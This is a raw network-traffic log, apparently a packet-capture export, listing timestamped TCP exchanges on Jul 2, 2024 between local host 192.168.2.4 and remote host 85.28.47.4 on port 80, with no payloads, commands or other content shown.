                                            Jul 2, 2024 08:26:28.753976107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.753978014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.753988981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754004955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754014015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754039049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754252911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754292011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754318953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754331112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754354000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754374027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754426956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754440069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754451990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754465103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754468918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754491091 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754589081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754673004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754684925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754697084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754707098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754709959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754718065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754729986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754734039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754740953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754749060 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754753113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754765034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.754777908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754786968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.754815102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755208969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755222082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755238056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755249023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755259037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755259991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755271912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755284071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755285025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755295992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755300045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755311966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755314112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755326033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755331039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755350113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755372047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755670071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755681992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755692959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755705118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755716085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755733967 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755769968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755780935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755795002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755805016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755806923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755817890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755824089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755830050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755836010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755844116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.755850077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.755878925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756303072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756340027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756351948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756362915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756391048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756402016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756494999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756505966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756517887 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756531954 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756542921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756556988 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756669998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756681919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756695032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756706953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756710052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756716967 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756719112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756731033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.756742001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.756762981 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757031918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757044077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757062912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757076025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757087946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757087946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757097006 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757101059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757112026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757122040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757123947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757137060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757144928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757148027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757160902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757188082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757721901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757734060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757744074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757755995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757767916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757771015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757777929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757790089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757800102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757802010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757812023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757812977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757819891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757824898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757838011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757849932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757862091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757872105 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757874012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757886887 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757896900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.757901907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757911921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.757944107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.758701086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758713961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758723974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758737087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758747101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758754969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.758763075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758775949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758788109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758788109 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.758800983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758804083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.758812904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758824110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758829117 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.758836031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758846998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758850098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.758858919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758866072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.758871078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758882046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758888006 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.758893967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.758908987 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.758929014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.759526014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.759538889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.759550095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.759562969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.759572029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.759578943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.759593010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.759608030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.842663050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.842703104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.842715979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.842772961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.842772961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.842787027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.842808962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.842808962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.842833996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.842835903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.842847109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.842859983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.842870951 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.842891932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.842900038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.842978001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.842989922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843000889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843023062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843046904 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843199015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843210936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843220949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843244076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843257904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843269110 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843270063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843283892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843296051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843296051 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843310118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843331099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843571901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843585968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843599081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843617916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843635082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843719006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843732119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843738079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843748093 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843760967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843769073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843775034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843786001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.843797922 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843812943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843837976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.843997955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844012022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844023943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844036102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844039917 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844053984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844078064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844094992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844110012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844120026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844132900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844136953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844146013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844146013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844157934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844171047 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844172001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844218969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844705105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844717026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844727993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844739914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844753981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844758987 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844765902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844778061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844778061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844789028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844790936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844803095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844810963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844815016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.844840050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.844858885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845242977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845254898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845268011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845279932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845285892 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845292091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845303059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845304966 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845314026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845326900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845329046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845339060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845347881 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845350027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845361948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845365047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845374107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845385075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845390081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845396996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845408916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845410109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845421076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845427036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845434904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.845448017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.845474958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846158981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846173048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846184969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846196890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846204996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846210003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846220970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846221924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846234083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846246004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846251011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846257925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846265078 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846268892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846281052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846285105 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846293926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846306086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846306086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846318960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846329927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846330881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846342087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846343040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846354961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.846369028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.846395016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847007990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847019911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847047091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847048998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847059011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847069979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847081900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847081900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847094059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847105026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847105980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847117901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847129107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847129107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847141981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847142935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847156048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847167969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847171068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847179890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847191095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847193956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847198963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847207069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847218990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847240925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847266912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847938061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847951889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847966909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847979069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.847986937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.847990990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.848002911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.848011017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.848016977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.848028898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.848031998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.848051071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.848063946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.848066092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.848076105 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.848099947 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.931699991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.931719065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.931732893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.931793928 CEST806388085.28.47.4192.168.2.4
